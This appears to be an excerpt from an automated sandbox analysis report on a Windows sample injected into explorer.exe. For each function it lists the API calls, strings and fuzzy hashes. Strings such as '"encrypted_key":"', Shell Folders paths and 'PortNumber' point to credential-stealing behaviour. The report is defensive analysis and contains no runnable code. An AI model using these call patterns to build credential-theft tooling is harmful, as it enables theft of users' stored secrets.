                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 03004335
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 03004363
                        • RegCloseKey.ADVAPI32(?), ref: 030043C8
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                          • Part of subcall function 0300418A: wsprintfW.USER32 ref: 03004212
                          • Part of subcall function 03001011: GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
                          • Part of subcall function 03001011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 030043B9
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                        • String ID:
                        • API String ID: 801677237-0
                        • Opcode ID: 91adf324032bee02c6370e9d13755344167296e9c3a8ae605c9c60ad1e819b41
                        • Instruction ID: e1377273907207a3772716927b664b48c40ef3eea0de9892e3b2803165c1804a
                        • Opcode Fuzzy Hash: 91adf324032bee02c6370e9d13755344167296e9c3a8ae605c9c60ad1e819b41
                        • Instruction Fuzzy Hash: 671190B5105305BFE715EB21CC48DBB77EDEB88304F40562EB98AD2140EB759D088A62
                        Function 0300B87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON
                        Download Yara Rule
                        APIs
                        • memset.NTDLL ref: 0300B8D5
                        • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0300B96F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CreateFilememset
                        • String ID: psow$winOpen
                        • API String ID: 2416746761-4101858489
                        • Opcode ID: 1ecd7665be43a6d54a2fb60e1737ef4ad86b2fe289354242ac55177f2ee7dee6
                        • Instruction ID: 6139c2c720d6aec589e4a37a3f9aab9e619c160190dd5446c8f2dc07d92b9a48
                        • Opcode Fuzzy Hash: 1ecd7665be43a6d54a2fb60e1737ef4ad86b2fe289354242ac55177f2ee7dee6
                        • Instruction Fuzzy Hash: 2471A071A067069FE750DF28C88075ABBE4FF89324F044A2DF8A4AB2C0D774D954CB92
                        Function 03069247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003067000.00000040.80000000.00040000.00000000.sdmp, Offset: 03067000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3067000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c94b97f536b20fdb99eecad6006625bcd6adf520ea2aaf245373c022f98f18b0
                        • Instruction ID: 6e06a6ab4964ab4e027fbecdb93edf2d3062eb4bd4e2918f24769a1a48383d62
                        • Opcode Fuzzy Hash: c94b97f536b20fdb99eecad6006625bcd6adf520ea2aaf245373c022f98f18b0
                        • Instruction Fuzzy Hash: BFA149B29167525FD721CF78CCD0AA4BBE4EB42224B1C0AADC5D1CBACAE770940AC751
                        Function 030019E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A1E
                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A3C
                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A75
                        • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A98
                          • Part of subcall function 03001011: GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
                          • Part of subcall function 03001011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                        • String ID:
                        • API String ID: 217796345-0
                        • Opcode ID: c27b441f74fd42b1221f80b0e7b1a6f6c5d648b930de4d3fb91ab8faf79ca08a
                        • Instruction ID: e51d09711caecca268b5ee3221f19327eb7ac01008891437df83f23e35fb1075
                        • Opcode Fuzzy Hash: c27b441f74fd42b1221f80b0e7b1a6f6c5d648b930de4d3fb91ab8faf79ca08a
                        • Instruction Fuzzy Hash: 1F21A37A20A3456FF729CA21CD44F7BB7EDEBCA754F080A2DF985A2180E725C9018621
                        Function 03001EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 03001ED5
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03001F0C
                        • RegCloseKey.ADVAPI32(?), ref: 03001F98
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03001F82
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                        • String ID:
                        • API String ID: 1077800024-0
                        • Opcode ID: 3d31c8304c0c21c524f2629126d9118f73c6bc7b4832ae0a6e530eb42de5c795
                        • Instruction ID: 8980fe11b9b34d64317338f7e0baf68df79870e4ccd678301a189a750819b35e
                        • Opcode Fuzzy Hash: 3d31c8304c0c21c524f2629126d9118f73c6bc7b4832ae0a6e530eb42de5c795
                        • Instruction Fuzzy Hash: A9217C79209305AFE709AB21CC48E7BBAEDEFC8354F40492DF49992190DB75C9059B22
                        Function 03001C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,03003E1E,00000000,?,03003FA8), ref: 03001C46
                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,03003FA8), ref: 03001C56
                        • CloseHandle.KERNEL32(00000000,?,03003FA8), ref: 03001C91
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,03003FA8), ref: 03001C76
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                        • String ID:
                        • API String ID: 2517252058-0
                        • Opcode ID: ab2a3b8ac97307ff6c11b2f12d81e629eeac1c7c7762d769094d5d99db4015da
                        • Instruction ID: c4bc240dcea6fa3771d55b62eb0ce53cee9f33a24f195e0003a0656a3fc52436
                        • Opcode Fuzzy Hash: ab2a3b8ac97307ff6c11b2f12d81e629eeac1c7c7762d769094d5d99db4015da
                        • Instruction Fuzzy Hash: 8DF0A43620231C7BE728AA2ADC8CE7B7A9CDB467F6F150719F515931C0EB5798054171
                        Function 03002FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,03003E30,00000000,00000000,?,03003FA8), ref: 03002FC1
                        • lstrlen.KERNEL32("encrypted_key":",?,03003FA8), ref: 03002FCE
                        • StrStrIA.SHLWAPI("encrypted_key":",0305692C,?,03003FA8), ref: 03002FDD
                          • Part of subcall function 0300190B: lstrlen.KERNEL32(?,?,?,?,00000000,03002783), ref: 0300192B
                          • Part of subcall function 0300190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,03002783), ref: 03001930
                          • Part of subcall function 0300190B: lstrcat.KERNEL32(00000000,?), ref: 03001946
                          • Part of subcall function 0300190B: lstrcat.KERNEL32(00000000,00000000), ref: 0300194A
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$lstrcat
                        • String ID: "encrypted_key":"
                        • API String ID: 493641738-877455259
                        • Opcode ID: bb1db2b98fa7de1b05a45c6a07e868020491f595eaf9adf35435f74f03e09513
                        • Instruction ID: 322300049edf84ecc027e339839b4ca98bc5fb5fd785cd68bbb298d90ebc3b36
                        • Opcode Fuzzy Hash: bb1db2b98fa7de1b05a45c6a07e868020491f595eaf9adf35435f74f03e09513
                        • Instruction Fuzzy Hash: DDE02B267077281FA3E1FBB91C48867BE8C9E0605034C0074F541C7142DE578401C2A4
                        Function 0300BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0300BB40
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID: winDelete
                        • API String ID: 3188754299-3936022152
                        • Opcode ID: 12618c03349c2307d52616f90e753af007bd499517e01e94db114288a0c32395
                        • Instruction ID: 0999a13139be5ba1385ffdd1317b22adc82ed7bdcb05d181837dc747a3573067
                        • Opcode Fuzzy Hash: 12618c03349c2307d52616f90e753af007bd499517e01e94db114288a0c32395
                        • Instruction Fuzzy Hash: 6911A135B06308EBFB10EB6988459BDB7B9DFC1760F144565E802DB2C8DFB4CA019752
                        Function 03002EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03001011: GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
                          • Part of subcall function 03001011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 03002EE4
                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03002F54
                        • RegCloseKey.KERNELBASE(?), ref: 03002F62
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                        • String ID:
                        • API String ID: 1066184869-0
                        • Opcode ID: 75ede4cfab9c6146d2e44b3d2eb950851fbf9d1a5c59598c7ef430712ce1f8db
                        • Instruction ID: cf6a39fb4387ecc698b3dd7ce2323149f5258b7a5217f41d273d9d102789fc8c
                        • Opcode Fuzzy Hash: 75ede4cfab9c6146d2e44b3d2eb950851fbf9d1a5c59598c7ef430712ce1f8db
                        • Instruction Fuzzy Hash: A901A739206350ABD719EF22DC08EBF7B9DEFC4390F00442DF54586184CB758805DBA1
                        Function 03009FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                        Download Yara Rule
                        APIs
                        • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 03009FF8
                        Strings
                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0300A00E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                        • API String ID: 10892065-982776804
                        • Opcode ID: f319df39e38252de830cc9753156719ab014fd90a250dfc7e8298066b6268f9f
                        • Instruction ID: 90859c0778bf4375dbe9630d82b755d7e78c5318f074c0dff21baa32101093fc
                        • Opcode Fuzzy Hash: f319df39e38252de830cc9753156719ab014fd90a250dfc7e8298066b6268f9f
                        • Instruction Fuzzy Hash: 77F0F072B46341BAF730AA54AC88F7B679CDB84B85F140829F946D62C5E674AC008320
                        Function 03001AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,03002E83,PathToExe,00000000,00000000), ref: 03001B16
                          • Part of subcall function 03001011: GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
                          • Part of subcall function 03001011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                          • Part of subcall function 030019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A1E
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A3C
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A75
                          • Part of subcall function 030019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A98
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 03001B40
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                        • API String ID: 2162223993-2036018995
                        • Opcode ID: 2dbc95621e45cc2182cb6b1b67d9c6db347dc5b2269bdf3c4203ca6ea6b389b5
                        • Instruction ID: 461f917ec068bc656cbd9d498d648f207a50acff7236bf7f2aa79507014fb4e7
                        • Opcode Fuzzy Hash: 2dbc95621e45cc2182cb6b1b67d9c6db347dc5b2269bdf3c4203ca6ea6b389b5
                        • Instruction Fuzzy Hash: D1F0903E603A4827F619A96BCC80EA7768ECBC53A6B060069F55987280EE577C015264
                        Function 0300A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0300A35F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID: winSeekFile
                        • API String ID: 973152223-3168307952
                        • Opcode ID: c13edcac75548efff6e2c3294a7d4f9f392eaf9468e0c4d83775cbbdea0452f8
                        • Instruction ID: c13bee621eb21d74cb1c35010e6e4e924b728c3e9ffc9aa290855b6803570c47
                        • Opcode Fuzzy Hash: c13edcac75548efff6e2c3294a7d4f9f392eaf9468e0c4d83775cbbdea0452f8
                        • Instruction Fuzzy Hash: 04F09A30716304AFE711EE74DC009ABB7AAEB44320F148669FC61CA2C4EA70DD0096A1
                        Function 03009EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(05220000,00000000,?), ref: 03009EB5
                        Strings
                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 03009ECD
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                        • API String ID: 1279760036-667713680
                        • Opcode ID: 749abf2a17348ac51b31408d7362f2296a6d4d898857f0f1df1f999bab305ba6
                        • Instruction ID: 441fef0facb2c7a2170930100e3fa49005865021fdc8b0944e229903cdd6440b
                        • Opcode Fuzzy Hash: 749abf2a17348ac51b31408d7362f2296a6d4d898857f0f1df1f999bab305ba6
                        • Instruction Fuzzy Hash: 9AE0C237A462107BD2127684AC04F6FB7A9DBC4F50F050015FA00A665DC778AC01D7A2
                        Function 03009EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlFreeHeap.NTDLL(05220000,00000000,?), ref: 03009EF8
                        Strings
                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 03009F0E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: FreeHeap
                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                        • API String ID: 3298025750-4030396798
                        • Opcode ID: ed4157f60738415e4025f3ebeb9ea9b45654c077a6b420fb8114ebf4f9bee78a
                        • Instruction ID: fdb511935cf1c368d4f44ddf21a2acd63b06cfd186e5906dbd3203819ff11793
                        • Opcode Fuzzy Hash: ed4157f60738415e4025f3ebeb9ea9b45654c077a6b420fb8114ebf4f9bee78a
                        • Instruction Fuzzy Hash: D6D0127614A301BBE205BA549C05F3B77BD9BD5E00F480418F514550AED7686051AB65
                        Function 03001B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: ChangeCloseCreateFileFindNotification
                        • String ID:
                        • API String ID: 727422849-0
                        • Opcode ID: 1ab9bb2f21ef2a8f6c63f0697991aaa425c34b4eadb0755b9b77019a1ed70cb4
                        • Instruction ID: 201f2ebd9c2f59f3f5181936a61ea1d0de5511ba5b759771bb0d0288e9e64be5
                        • Opcode Fuzzy Hash: 1ab9bb2f21ef2a8f6c63f0697991aaa425c34b4eadb0755b9b77019a1ed70cb4
                        • Instruction Fuzzy Hash: 22D0127625373062E6F966357C0CEA7AE5CDF027B5F481614B61DD50C4E715888781E0
                        Function 03001011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03001162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0300116F
                        • GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
                        • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001027
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$FreeProcessQueryVirtual
                        • String ID:
                        • API String ID: 2580854192-0
                        • Opcode ID: 29669bc99e74cb4808287413a78084c544d871d96a818777d3442f7d764ea8d6
                        • Instruction ID: 30a1525e58240bd1ef59b45652c5af93c31e6b3d8d309c4eae23147db2d06c1d
                        • Opcode Fuzzy Hash: 29669bc99e74cb4808287413a78084c544d871d96a818777d3442f7d764ea8d6
                        • Instruction Fuzzy Hash: F3C08C3500332052DAA877A8790CBDB2B08CF89322F080041B48297185CEBA880086A0
                        Function 03004B72 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: ExitInitializeProcess
                        • String ID:
                        • API String ID: 2609639641-0
                        • Opcode ID: 8a0239d4c122c31ed40561ebb3622eebc57428c02a0980091b75807acf7fcc5d
                        • Instruction ID: 975511175d1c563fcaec1a7f4a39d770cb3f824d9c9702116873af970c491e7b
                        • Opcode Fuzzy Hash: 8a0239d4c122c31ed40561ebb3622eebc57428c02a0980091b75807acf7fcc5d
                        • Instruction Fuzzy Hash: EFC04C342477044BF7807BE15C0D71A3558AB00712F446014E3098A0C4DA5A40008A2A
                        Function 030012A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                        • RtlZeroMemory.NTDLL(?,00000018), ref: 030012B5
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: MemoryZero
                        • String ID:
                        • API String ID: 816449071-0
                        • Opcode ID: 1c452d6cdc6f4328c3ba483dfb2e8570519c78aca25478ea9d7864e09f208617
                        • Instruction ID: 47278accfd70e3ddba6fa10cdea71ae88d50d4bf3f41b8a8c97cdd3f02c522b6
                        • Opcode Fuzzy Hash: 1c452d6cdc6f4328c3ba483dfb2e8570519c78aca25478ea9d7864e09f208617
                        • Instruction Fuzzy Hash: 2F11F8B5A02209AFEB14EFA9D984ABFBBFCEB08341F544429F945E7240D735D900CB64
                        Function 03001B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNELBASE(00000000,00000000,03002C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 03001BAA
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 781ebd3576f590403be477aaac173ed7ec4d05e0d0b359be8ac018552a60a931
                        • Instruction ID: acbd0d5b715d97e22df62e038c29e085a3141ccbabd779a400aea76d07cb3cdb
                        • Opcode Fuzzy Hash: 781ebd3576f590403be477aaac173ed7ec4d05e0d0b359be8ac018552a60a931
                        • Instruction Fuzzy Hash: 05D0A937E0753082AAA8A6783844893E2C06A0067531E03B4FC26F30C4E329CC8242C0
                        Function 0300104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0300158A), ref: 03001056
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 5e9513dd84551d34b04031c4f54db2860c78d4b9d1bdc52271deabcfbef52a39
                        • Instruction ID: a1eded6c1c4a0f02b24fc5a8281acd09271002b1cd66740d9ed7c26f0dd19ad5
                        • Opcode Fuzzy Hash: 5e9513dd84551d34b04031c4f54db2860c78d4b9d1bdc52271deabcfbef52a39
                        • Instruction Fuzzy Hash: F1A001B17963046AFEA96762AE1BF1629289740B02F502244B309680C456E975008529
                        Function 0300105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                        Download Yara Rule
                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,03004A5B,?,?,00000000,?,?,?,?,03004B66,?), ref: 03001065
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 6f8281b6b9dfa92dfe3cc73ee17a3fe46b84a92bd59f48bec7492d346d9e8fef
                        • Instruction ID: 2eacdbeba056f77cb7fc3833a8d9a98f49ddfb3ef6a3438e25096e758ee2fe4a
                        • Opcode Fuzzy Hash: 6f8281b6b9dfa92dfe3cc73ee17a3fe46b84a92bd59f48bec7492d346d9e8fef
                        • Instruction Fuzzy Hash: BCA0027069170466EEF467245D0AF1626146740B02F6455447281A90C54DAAE0448A1C

                        Non-executed Functions

                        Function 0300349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 030034C0
                          • Part of subcall function 030033C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 03003401
                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,030037A8), ref: 030034E9
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0300351E
                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 03003541
                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 03003586
